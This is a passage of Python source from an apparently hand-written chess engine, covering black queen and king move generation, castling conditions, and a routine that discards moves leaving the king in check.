for move in move_list:
if move[6] == "N":
if move[7] == "_":
if int(move[8]) >= j:
queen_moves[move] = False
elif int(move[9]) >= j:
queen_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.black_occupation_x)):
if self.black_queens_inf[i][0] == self.black_occupation_x[k] and self.black_queens_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "_" and int(move[8]) >= j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] + j == self.black_occupation_x[k] and self.black_queens_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "E" and int(move[9]) >= j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] + j == self.black_occupation_x[k] and self.black_queens_inf[i][1] == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "E" and move[7] == "_" and int(move[8]) >= j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] + j == self.black_occupation_x[k] and self.black_queens_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "E" and int(move[9]) >= j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] == self.black_occupation_x[k] and self.black_queens_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "_" and int(move[8]) >= j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] - j == self.black_occupation_x[k] and self.black_queens_inf[i][1] - j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "W" and int(move[9]) >= j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] - j == self.black_occupation_x[k] and self.black_queens_inf[i][1] == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "W" and move[7] == "_" and int(move[8]) >= j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] - j == self.black_occupation_x[k] and self.black_queens_inf[i][1] + j == self.black_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "W" and int(move[9]) >= j:
queen_moves[move] = False
for j in range(1, 8):
for k in range(0, len(self.white_occupation_x)):
if self.black_queens_inf[i][0] == self.white_occupation_x[k] and self.black_queens_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "_" and int(move[8]) > j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] + j == self.white_occupation_x[k] and self.black_queens_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "E" and int(move[9]) > j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] + j == self.white_occupation_x[k] and self.black_queens_inf[i][1] == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "E" and move[7] == "_" and int(move[8]) > j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] + j == self.white_occupation_x[k] and self.black_queens_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "E" and int(move[9]) > j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] == self.white_occupation_x[k] and self.black_queens_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "_" and int(move[8]) > j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] - j == self.white_occupation_x[k] and self.black_queens_inf[i][1] - j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "S" and move[7] == "W" and int(move[9]) > j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] - j == self.white_occupation_x[k] and self.black_queens_inf[i][1] == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "W" and move[7] == "_" and int(move[8]) > j:
queen_moves[move] = False
elif self.black_queens_inf[i][0] - j == self.white_occupation_x[k] and self.black_queens_inf[i][1] + j == self.white_occupation_y[k]:
for move in move_list:
if move[6] == "N" and move[7] == "W" and int(move[9]) > j:
queen_moves[move] = False
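                    # Emit the queen moves that survived the blocking checks in long algebraic form.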
for move in move_list:
if queen_moves[move] == True:
if move[6] == "N" and move[7] == "_":
self.legal_moves.append(notation.get_notation("Q", self.black_queens_inf[i][0], self.black_queens_inf[i][1], self.black_queens_inf[i][0], self.black_queens_inf[i][1] + int(move[8])))
elif move[6] == "N" and move[7] == "E":
self.legal_moves.append(notation.get_notation("Q", self.black_queens_inf[i][0], self.black_queens_inf[i][1], self.black_queens_inf[i][0] + int(move[9]), self.black_queens_inf[i][1] + int(move[9])))
elif move[6] == "E" and move[7] == "_":
self.legal_moves.append(notation.get_notation("Q", self.black_queens_inf[i][0], self.black_queens_inf[i][1], self.black_queens_inf[i][0] + int(move[8]), self.black_queens_inf[i][1]))
elif move[6] == "S" and move[7] == "E":
self.legal_moves.append(notation.get_notation("Q", self.black_queens_inf[i][0], self.black_queens_inf[i][1], self.black_queens_inf[i][0] + int(move[9]), self.black_queens_inf[i][1] - int(move[9])))
elif move[6] == "S" and move[7] == "_":
self.legal_moves.append(notation.get_notation("Q", self.black_queens_inf[i][0], self.black_queens_inf[i][1], self.black_queens_inf[i][0], self.black_queens_inf[i][1] - int(move[8])))
elif move[6] == "S" and move[7] == "W":
self.legal_moves.append(notation.get_notation("Q", self.black_queens_inf[i][0], self.black_queens_inf[i][1], self.black_queens_inf[i][0] - int(move[9]), self.black_queens_inf[i][1] - int(move[9])))
elif move[6] == "W" and move[7] == "_":
self.legal_moves.append(notation.get_notation("Q", self.black_queens_inf[i][0], self.black_queens_inf[i][1], self.black_queens_inf[i][0] - int(move[8]), self.black_queens_inf[i][1]))
elif move[6] == "N" and move[7] == "W":
self.legal_moves.append(notation.get_notation("Q", self.black_queens_inf[i][0], self.black_queens_inf[i][1], self.black_queens_inf[i][0] - int(move[9]), self.black_queens_inf[i][1] + int(move[9])))
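                # Black king: one square in each of the eight directions, clipped at the board edges below.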
if self.black_king_inf[0][2] == True:
move_list = ["king_N_1", "king_NE_1", "king_E_1", "king_SE_1", "king_S_1", "king_SW_1", "king_W_1", "king_NW_1"]
king_moves = {
"king_N_1" : True,
"king_NE_1" : True,
"king_E_1" : True,
"king_SE_1" : True,
"king_S_1" : True,
"king_SW_1" : True,
"king_W_1" : True,
"king_NW_1" : True,
}
if self.black_king_inf[0][0] - 1 < 0:
for move in move_list:
if move[5] == "W" or move[6] == "W":
king_moves[move] = False
if self.black_king_inf[0][1] - 1 < 0:
for move in move_list:
if move[5] == "S":
king_moves[move] = False
if self.black_king_inf[0][0] + 1 > 7:
for move in move_list:
if move[5] == "E" or move[6] == "E":
king_moves[move] = False
if self.black_king_inf[0][1] + 1 > 7:
for move in move_list:
if move[5] == "N":
king_moves[move] = False
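                    # A square occupied by one of black's own pieces is not available to the king.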
for i in range(0, len(self.black_occupation_x)):
if self.black_king_inf[0][0] == self.black_occupation_x[i] and self.black_king_inf[0][1] + 1 == self.black_occupation_y[i]:
for move in move_list:
if move[5] == "N" and move[6] == "_":
king_moves[move] = False
elif self.black_king_inf[0][0] + 1 == self.black_occupation_x[i] and self.black_king_inf[0][1] + 1 == self.black_occupation_y[i]:
for move in move_list:
if move[5] == "N" and move[6] == "E":
king_moves[move] = False
elif self.black_king_inf[0][0] + 1 == self.black_occupation_x[i] and self.black_king_inf[0][1] == self.black_occupation_y[i]:
for move in move_list:
if move[5] == "E" and move[6] == "_":
king_moves[move] = False
elif self.black_king_inf[0][0] + 1 == self.black_occupation_x[i] and self.black_king_inf[0][1] - 1 == self.black_occupation_y[i]:
for move in move_list:
if move[5] == "S" and move[6] == "E":
king_moves[move] = False
elif self.black_king_inf[0][0] == self.black_occupation_x[i] and self.black_king_inf[0][1] - 1 == self.black_occupation_y[i]:
for move in move_list:
if move[5] == "S" and move[6] == "_":
king_moves[move] = False
elif self.black_king_inf[0][0] - 1 == self.black_occupation_x[i] and self.black_king_inf[0][1] - 1 == self.black_occupation_y[i]:
for move in move_list:
if move[5] == "S" and move[6] == "W":
king_moves[move] = False
elif self.black_king_inf[0][0] - 1 == self.black_occupation_x[i] and self.black_king_inf[0][1] == self.black_occupation_y[i]:
for move in move_list:
if move[5] == "W" and move[6] == "_":
king_moves[move] = False
elif self.black_king_inf[0][0] - 1 == self.black_occupation_x[i] and self.black_king_inf[0][1] + 1 == self.black_occupation_y[i]:
for move in move_list:
if move[5] == "N" and move[6] == "W":
king_moves[move] = False
for move in move_list:
if king_moves[move] == True:
if move[5] == "N" and move[6] == "_":
self.legal_moves.append(notation.get_notation("K", self.black_king_inf[0][0], self.black_king_inf[0][1], self.black_king_inf[0][0], self.black_king_inf[0][1] + 1))
elif move[5] == "N" and move[6] == "E":
self.legal_moves.append(notation.get_notation("K", self.black_king_inf[0][0], self.black_king_inf[0][1], self.black_king_inf[0][0] + 1, self.black_king_inf[0][1] + 1))
elif move[5] == "E" and move[6] == "_":
self.legal_moves.append(notation.get_notation("K", self.black_king_inf[0][0], self.black_king_inf[0][1], self.black_king_inf[0][0] + 1, self.black_king_inf[0][1]))
elif move[5] == "S" and move[6] == "E":
self.legal_moves.append(notation.get_notation("K", self.black_king_inf[0][0], self.black_king_inf[0][1], self.black_king_inf[0][0] + 1, self.black_king_inf[0][1] - 1))
elif move[5] == "S" and move[6] == "_":
self.legal_moves.append(notation.get_notation("K", self.black_king_inf[0][0], self.black_king_inf[0][1], self.black_king_inf[0][0], self.black_king_inf[0][1] - 1))
elif move[5] == "S" and move[6] == "W":
self.legal_moves.append(notation.get_notation("K", self.black_king_inf[0][0], self.black_king_inf[0][1], self.black_king_inf[0][0] - 1, self.black_king_inf[0][1] - 1))
elif move[5] == "W" and move[6] == "_":
self.legal_moves.append(notation.get_notation("K", self.black_king_inf[0][0], self.black_king_inf[0][1], self.black_king_inf[0][0] - 1, self.black_king_inf[0][1]))
elif move[5] == "N" and move[6] == "W":
self.legal_moves.append(notation.get_notation("K", self.black_king_inf[0][0], self.black_king_inf[0][1], self.black_king_inf[0][0] - 1, self.black_king_inf[0][1] + 1))
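                # Castling: the king must be alive and unmoved, the squares between king and rook empty, and the
                # rook alive and unmoved; moving through check is filtered out later in check_checks.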
if self.black_king_inf[0][2] == True and self.black_king_inf[0][3] == True:
move_list = ["O-O", "O-O-O"]
king_moves = {
"O-O" : True,
"O-O-O" : True,
}
for i in range(0, len(self.white_occupation_x)):
if self.black_king_inf[0][0] + 2 == self.white_occupation_x[i] and self.black_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O"] = False
elif self.black_king_inf[0][0] + 1 == self.white_occupation_x[i] and self.black_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O"] = False
if self.black_king_inf[0][0] - 3 == self.white_occupation_x[i] and self.black_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O-O"] = False
elif self.black_king_inf[0][0] - 2 == self.white_occupation_x[i] and self.black_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O-O"] = False
elif self.black_king_inf[0][0] - 1 == self.white_occupation_x[i] and self.black_king_inf[0][1] == self.white_occupation_y[i]:
king_moves["O-O-O"] = False
for i in range(0, len(self.black_occupation_x)):
if self.black_king_inf[0][0] + 2 == self.black_occupation_x[i] and self.black_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O"] = False
elif self.black_king_inf[0][0] + 1 == self.black_occupation_x[i] and self.black_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O"] = False
if self.black_king_inf[0][0] - 3 == self.black_occupation_x[i] and self.black_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O-O"] = False
elif self.black_king_inf[0][0] - 2 == self.black_occupation_x[i] and self.black_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O-O"] = False
elif self.black_king_inf[0][0] - 1 == self.black_occupation_x[i] and self.black_king_inf[0][1] == self.black_occupation_y[i]:
king_moves["O-O-O"] = False
for i in range(0, 2):
if self.black_rooks_inf[i][2] == False or self.black_rooks_inf[i][3] == False:
if i == 0:
king_moves["O-O-O"] = False
elif i == 1:
king_moves["O-O"] = False
for move in move_list:
if king_moves[move] == True:
self.legal_moves.append(move)
#print(self.legal_moves)
self.legal_moves_move_notation = self.legal_moves
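        # Play every pseudo-legal move on deep copies of the piece lists and discard any move that would leave
        # the mover's own king attacked.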
def check_checks(self):
moves = deepcopy(self.legal_moves)
white_short_castle_through_check_check = False
white_long_castle_through_check_check = False
black_short_castle_through_check_check = False
black_long_castle_through_check_check = False
for move in moves:
white_pawns = deepcopy(self.white_pawns_inf)
white_bishops = deepcopy(self.white_bishops_inf)
white_knights = deepcopy(self.white_knights_inf)
white_rooks = deepcopy(self.white_rooks_inf)
white_queens = deepcopy(self.white_queens_inf)
white_king = deepcopy(self.white_king_inf)
black_pawns = deepcopy(self.black_pawns_inf)
black_bishops = deepcopy(self.black_bishops_inf)
black_knights = deepcopy(self.black_knights_inf)
black_rooks = deepcopy(self.black_rooks_inf)
black_queens = deepcopy(self.black_queens_inf)
black_king = deepcopy(self.black_king_inf)
#en_passant_xy = deepcopy(self.en_passant_x_y)
#white_occ_x = deepcopy(self.white_occupation_x)
#white_occ_y = deepcopy(self.white_occupation_y)
#black_occ_x = deepcopy(self.black_occupation_x)
#black_occ_y = deepcopy(self.black_occupation_y)
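                # Strip '+'/'x' from the move; the lone king steps Ke1f1, Ke1d1, Ke8f8 and Ke8d8 double as probes
                # for castling through check.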
notation_val, take = self.convert_to_easy_notation(move)
if notation_val == "Ke1f1" and startup.white_turn == True:
white_short_castle_through_check_check = True
if notation_val == "Ke1d1" and startup.white_turn == True:
white_long_castle_through_check_check = True
if notation_val == "Ke8f8" and startup.white_turn == False:
black_short_castle_through_check_check = True
if notation_val == "Ke8d8" and startup.white_turn == False:
black_long_castle_through_check_check = True
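                # Apply the move to the copied piece lists, keyed on the leading piece letter (castling under "O",
                # pawn moves in the final else).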
if notation_val[0] == "B":
fromx = notation.get_column_char(notation_val[1])
fromy = int(notation_val[2]) - 1
tox = notation.get_column_char(notation_val[3])
toy = int(notation_val[4]) - 1
if startup.white_turn == True:
for i in range(0, 10):
if white_bishops[i][2] == True and white_bishops[i][0] == fromx and white_bishops[i][1] == fromy:
white_bishops[i][0] = tox
white_bishops[i][1] = toy
else:
for i in range(0, 10):
if black_bishops[i][2] == True and black_bishops[i][0] == fromx and black_bishops[i][1] == fromy:
black_bishops[i][0] = tox
black_bishops[i][1] = toy
elif notation_val[0] == "N":
fromx = notation.get_column_char(notation_val[1])
fromy = int(notation_val[2]) - 1
tox = notation.get_column_char(notation_val[3])
toy = int(notation_val[4]) - 1
if startup.white_turn == True:
for i in range(0, 10):
if white_knights[i][2] == True and white_knights[i][0] == fromx and white_knights[i][1] == fromy:
white_knights[i][0] = tox
white_knights[i][1] = toy
else:
for i in range(0, 10):
if black_knights[i][2] == True and black_knights[i][0] == fromx and black_knights[i][1] == fromy:
black_knights[i][0] = tox
black_knights[i][1] = toy
elif notation_val[0] == "R":
fromx = notation.get_column_char(notation_val[1])
fromy = int(notation_val[2]) - 1
tox = notation.get_column_char(notation_val[3])
toy = int(notation_val[4]) - 1
if startup.white_turn == True:
for i in range(0, 10):
if white_rooks[i][2] == True and white_rooks[i][0] == fromx and white_rooks[i][1] == fromy:
white_rooks[i][0] = tox
white_rooks[i][1] = toy
white_rooks[i][3] = False
else:
for i in range(0, 10):
if black_rooks[i][2] == True and black_rooks[i][0] == fromx and black_rooks[i][1] == fromy:
black_rooks[i][0] = tox
black_rooks[i][1] = toy
black_rooks[i][3] = False
elif notation_val[0] == "Q":
fromx = notation.get_column_char(notation_val[1])
fromy = int(notation_val[2]) - 1
tox = notation.get_column_char(notation_val[3])
toy = int(notation_val[4]) - 1
if startup.white_turn == True:
for i in range(0, 9):
if white_queens[i][2] == True and white_queens[i][0] == fromx and white_queens[i][1] == fromy:
white_queens[i][0] = tox
white_queens[i][1] = toy
else:
for i in range(0, 9):
if black_queens[i][2] == True and black_queens[i][0] == fromx and black_queens[i][1] == fromy:
black_queens[i][0] = tox
black_queens[i][1] = toy
elif notation_val[0] == "K":
fromx = notation.get_column_char(notation_val[1])
fromy = int(notation_val[2]) - 1
tox = notation.get_column_char(notation_val[3])
toy = int(notation_val[4]) - 1
if startup.white_turn == True:
if white_king[0][2] == True and white_king[0][0] == fromx and white_king[0][1] == fromy:
white_king[0][0] = tox
white_king[0][1] = toy
white_king[0][3] = False
else:
if black_king[0][2] == True and black_king[0][0] == fromx and black_king[0][1] == fromy:
black_king[0][0] = tox
black_king[0][1] = toy
black_king[0][3] = False
elif notation_val[0] == "O":
if startup.white_turn == True:
white_king[0][3] = False
if notation_val == "O-O":
white_rooks[1][3] = False
white_king[0][0] = 6
white_king[0][1] = 0
for i in range(0, 2):
if white_rooks[i][0] == 7:
white_rooks[i][0] = 5
white_rooks[i][1] = 0
elif notation_val == "O-O-O":
white_rooks[0][3] = False
white_king[0][0] = 2
white_king[0][1] = 0
for i in range(0, 2):
if white_rooks[i][0] == 0:
white_rooks[i][0] = 3
white_rooks[i][1] = 0
else:
black_king[0][3] = False
if notation_val == "O-O":
black_rooks[1][3] = False
black_king[0][0] = 6
black_king[0][1] = 7
for i in range(0, 2):
if black_rooks[i][0] == 7:
black_rooks[i][0] = 5
black_rooks[i][1] = 7
elif notation_val == "O-O-O":
black_rooks[0][3] = False
black_king[0][0] = 2
black_king[0][1] = 7
for i in range(0, 2):
if black_rooks[i][0] == 0:
black_rooks[i][0] = 3
black_rooks[i][1] = 7
else:
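                    # Pawn move (no leading piece letter): work out the source and destination squares and any
                    # promotion piece from the notation.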
if True:
if notation_val[-2] == "=":
tox = notation.get_column_char(notation_val[-4])
toy = int(notation_val[-3]) - 1
else:
tox = notation.get_column_char(notation_val[-2])
toy = int(notation_val[-1]) - 1
if take == True:
if notation_val[-2] == "=":
fromx = notation.get_column_char(notation_val[-5])
else:
fromx = notation.get_column_char(notation_val[-3])
if startup.white_turn == True:
fromy = toy - 1
else:
fromy = toy + 1
else:
fromx = tox
if startup.white_turn == True:
if toy == 3:
fromy = toy - 2
for i in range(0, 8):
if white_pawns[i][2] == True and white_pawns[i][0] == fromx and white_pawns[i][1] == toy - 1:
fromy = toy - 1
else:
fromy = toy - 1
else:
if toy == 4:
fromy = toy + 2
for i in range(0, 8):
if black_pawns[i][2] == True and black_pawns[i][0] == fromx and black_pawns[i][1] == toy + 1:
fromy = toy + 1
else:
fromy = toy + 1
if startup.white_turn == True:
for i in range(0, 8):
if white_pawns[i][2] == True and white_pawns[i][0] == fromx and white_pawns[i][1] == fromy:
if toy == 7:
white_pawns[i][2] = False
if notation_val[-1] == "Q":
promotion_complete = False
for i in range(1, 9):
if white_queens[i][2] == False and promotion_complete == False:
promotion_complete = True
white_queens[i][0] = tox
white_queens[i][1] = toy
white_queens[i][2] = True
elif notation_val[-1] == "R":
promotion_complete = False
for i in range(2, 10):
if white_rooks[i][2] == False and promotion_complete == False:
promotion_complete = True
white_rooks[i][0] = tox
white_rooks[i][1] = toy
white_rooks[i][2] = True
white_rooks[i][3] = False
elif notation_val[-1] == "B":
promotion_complete = False
for i in range(2, 10):
if white_bishops[i][2] == False and promotion_complete == False:
promotion_complete = True
white_bishops[i][0] = tox
white_bishops[i][1] = toy
white_bishops[i][2] = True
elif notation_val[-1] == "N":
promotion_complete = False
for i in range(2, 10):
if white_knights[i][2] == False and promotion_complete == False:
promotion_complete = True
white_knights[i][0] = tox
white_knights[i][1] = toy
white_knights[i][2] = True
else:
white_pawns[i][0] = tox
white_pawns[i][1] = toy
white_pawns[i][3] = False
else:
for i in range(0, 8):
if black_pawns[i][2] == True and black_pawns[i][0] == fromx and black_pawns[i][1] == fromy:
if toy == 0:
black_pawns[i][2] = False
if notation_val[-1] == "Q":
promotion_complete = False
for i in range(1, 9):
if black_queens[i][2] == False and promotion_complete == False:
promotion_complete = True
black_queens[i][0] = tox
black_queens[i][1] = toy
black_queens[i][2] = True
elif notation_val[-1] == "R":
promotion_complete = False
for i in range(2, 10):
if black_rooks[i][2] == False and promotion_complete == False:
promotion_complete = True
black_rooks[i][0] = tox
black_rooks[i][1] = toy
black_rooks[i][2] = True
black_rooks[i][3] = False
elif notation_val[-1] == "B":
promotion_complete = False
for i in range(2, 10):
if black_bishops[i][2] == False and promotion_complete == False:
promotion_complete = True
black_bishops[i][0] = tox
black_bishops[i][1] = toy
black_bishops[i][2] = True
elif notation_val[-1] == "N":
promotion_complete = False
for i in range(2, 10):
if black_knights[i][2] == False and promotion_complete == False:
promotion_complete = True
black_knights[i][0] = tox
black_knights[i][1] = toy
black_knights[i][2] = True
else:
black_pawns[i][0] = tox
black_pawns[i][1] = toy
black_pawns[i][3] = False
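                            # Remove the captured piece from the copies; if the target square is empty the capture
                            # must have been en passant, so take the pawn behind it.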
if take == True:
piece_taken = False
if startup.white_turn == True:
for i in range(0, 8):
if black_pawns[i][2] == True and black_pawns[i][0] == tox and black_pawns[i][1] == toy:
black_pawns[i][2] = False
piece_taken = True
for i in range(0, 10):
if black_bishops[i][2] == True and black_bishops[i][0] == tox and black_bishops[i][1] == toy:
black_bishops[i][2] = False
piece_taken = True
for i in range(0, 10):
if black_knights[i][2] == True and black_knights[i][0] == tox and black_knights[i][1] == toy:
black_knights[i][2] = False
piece_taken = True
for i in range(0, 10):
if black_rooks[i][2] == True and black_rooks[i][0] == tox and black_rooks[i][1] == toy:
black_rooks[i][2] = False
piece_taken = True
for i in range(0, 9):
if black_queens[i][2] == True and black_queens[i][0] == tox and black_queens[i][1] == toy:
black_queens[i][2] = False
piece_taken = True
if piece_taken == False:
for i in range(0, 8):
if black_pawns[i][2] == True and black_pawns[i][0] == tox and black_pawns[i][1] == toy - 1:
black_pawns[i][2] = False
else:
for i in range(0, 8):
if white_pawns[i][2] == True and white_pawns[i][0] == tox and white_pawns[i][1] == toy:
white_pawns[i][2] = False
piece_taken = True
for i in range(0, 10):
if white_bishops[i][2] == True and white_bishops[i][0] == tox and white_bishops[i][1] == toy:
white_bishops[i][2] = False
piece_taken = True
for i in range(0, 10):
if white_knights[i][2] == True and white_knights[i][0] == tox and white_knights[i][1] == toy:
white_knights[i][2] = False
piece_taken = True
for i in range(0, 10):
if white_rooks[i][2] == True and white_rooks[i][0] == tox and white_rooks[i][1] == toy:
white_rooks[i][2] = False
piece_taken = True
for i in range(0, 9):
if white_queens[i][2] == True and white_queens[i][0] == tox and white_queens[i][1] == toy:
white_queens[i][2] = False
piece_taken = True
if piece_taken == False:
for i in range(0, 8):
if white_pawns[i][2] == True and white_pawns[i][0] == tox and white_pawns[i][1] == toy + 1:
white_pawns[i][2] = False
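                            # Rebuild the occupancy lists from the copied piece positions after the trial move.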
white_occ_x = []
white_occ_y = []
black_occ_x = []
black_occ_y = []
for i in range(0, 8):
if white_pawns[i][2] == True:
white_occ_x.append(white_pawns[i][0])
white_occ_y.append(white_pawns[i][1])
for i in range(0, 10):
if white_knights[i][2] == True:
white_occ_x.append(white_knights[i][0])
white_occ_y.append(white_knights[i][1])
for i in range(0, 10):
if white_bishops[i][2] == True:
white_occ_x.append(white_bishops[i][0])
white_occ_y.append(white_bishops[i][1])
for i in range(0, 10):
if white_rooks[i][2] == True:
white_occ_x.append(white_rooks[i][0])
white_occ_y.append(white_rooks[i][1])
for i in range(0, 9):
if white_queens[i][2] == True:
white_occ_x.append(white_queens[i][0])
white_occ_y.append(white_queens[i][1])
if white_king[0][2] == True:
white_occ_x.append(white_king[0][0])
white_occ_y.append(white_king[0][1])
for i in range(0, 8):
if black_pawns[i][2] == True:
black_occ_x.append(black_pawns[i][0])
black_occ_y.append(black_pawns[i][1])
for i in range(0, 10):
if black_knights[i][2] == True:
black_occ_x.append(black_knights[i][0])
black_occ_y.append(black_knights[i][1])
for i in range(0, 10):
if black_bishops[i][2] == True:
black_occ_x.append(black_bishops[i][0])
black_occ_y.append(black_bishops[i][1])
for i in range(0, 10):
if black_rooks[i][2] == True:
black_occ_x.append(black_rooks[i][0])
black_occ_y.append(black_rooks[i][1])
for i in range(0, 9):
if black_queens[i][2] == True:
black_occ_x.append(black_queens[i][0])
black_occ_y.append(black_queens[i][1])
if black_king[0][2] == True:
black_occ_x.append(black_king[0][0])
black_occ_y.append(black_king[0][1])
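                # If the trial move leaves the mover's king attacked (by pawn, knight, slider or the enemy king),
                # remove it from the legal moves.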
if startup.white_turn == True:
for i in range(0, 8):
if white_king[0][0] + 1 == black_pawns[i][0] and white_king[0][1] + 1 == black_pawns[i][1] and black_pawns[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif white_king[0][0] - 1 == black_pawns[i][0] and white_king[0][1] + 1 == black_pawns[i][1] and black_pawns[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
for i in range(0, 10):
if white_king[0][0] + 1 == black_knights[i][0] and white_king[0][1] + 2 == black_knights[i][1] and black_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif white_king[0][0] + 2 == black_knights[i][0] and white_king[0][1] + 1 == black_knights[i][1] and black_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif white_king[0][0] + 2 == black_knights[i][0] and white_king[0][1] - 1 == black_knights[i][1] and black_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif white_king[0][0] + 1 == black_knights[i][0] and white_king[0][1] - 2 == black_knights[i][1] and black_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif white_king[0][0] - 1 == black_knights[i][0] and white_king[0][1] - 2 == black_knights[i][1] and black_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif white_king[0][0] - 2 == black_knights[i][0] and white_king[0][1] - 1 == black_knights[i][1] and black_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif white_king[0][0] - 2 == black_knights[i][0] and white_king[0][1] + 1 == black_knights[i][1] and black_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
elif white_king[0][0] - 1 == black_knights[i][0] and white_king[0][1] + 2 == black_knights[i][1] and black_knights[i][2] == True:
if move in self.legal_moves:
self.legal_moves.remove(move)
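                            # A bishop on the king's diagonal gives check only when no piece of either colour stands
                            # between it and the king; the same pattern repeats for rooks and queens below.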
for i in range(0, 10):
remove = True
if black_bishops[i][2] == True and abs(black_bishops[i][0] - white_king[0][0]) == abs(black_bishops[i][1] - white_king[0][1]):
if black_bishops[i][0] > white_king[0][0]:
if black_bishops[i][1] > white_king[0][1]:
for j in range(1, abs(black_bishops[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] + j and white_occ_y[k] == white_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] + j and black_occ_y[k] == white_king[0][1] + j:
remove = False
else:
for j in range(1, abs(black_bishops[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] + j and white_occ_y[k] == white_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] + j and black_occ_y[k] == white_king[0][1] - j:
remove = False
else:
if black_bishops[i][1] > white_king[0][1]:
for j in range(1, abs(black_bishops[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] - j and white_occ_y[k] == white_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] - j and black_occ_y[k] == white_king[0][1] + j:
remove = False
else:
for j in range(1, abs(black_bishops[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] - j and white_occ_y[k] == white_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] - j and black_occ_y[k] == white_king[0][1] - j:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
for i in range(0, 10):
remove = True
if black_rooks[i][2] == True:
if black_rooks[i][0] == white_king[0][0]:
if black_rooks[i][1] > white_king[0][1]:
for j in range(1, abs(black_rooks[i][1] - white_king[0][1])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] and white_occ_y[k] == white_king[0][1] + j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] and black_occ_y[k] == white_king[0][1] + j:
remove = False
else:
for j in range(1, abs(black_rooks[i][1] - white_king[0][1])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] and white_occ_y[k] == white_king[0][1] - j:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] and black_occ_y[k] == white_king[0][1] - j:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
elif black_rooks[i][1] == white_king[0][1]:
if black_rooks[i][0] > white_king[0][0]:
for j in range(1, abs(black_rooks[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] + j and white_occ_y[k] == white_king[0][1]:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] + j and black_occ_y[k] == white_king[0][1]:
remove = False
else:
for j in range(1, abs(black_rooks[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] - j and white_occ_y[k] == white_king[0][1]:
remove = False
for k in range(0, len(black_occ_x)):
if black_occ_x[k] == white_king[0][0] - j and black_occ_y[k] == white_king[0][1]:
remove = False
if remove == True and move in self.legal_moves:
self.legal_moves.remove(move)
for i in range(0, 9):
remove = True
if black_queens[i][2] == True and abs(black_queens[i][0] - white_king[0][0]) == abs(black_queens[i][1] - white_king[0][1]):
if black_queens[i][0] > white_king[0][0]:
if black_queens[i][1] > white_king[0][1]:
for j in range(1, abs(black_queens[i][0] - white_king[0][0])):
for k in range(0, len(white_occ_x)):
if white_occ_x[k] == white_king[0][0] + j and white_occ_y[k] == white_king[0][1] + j:
remove = False
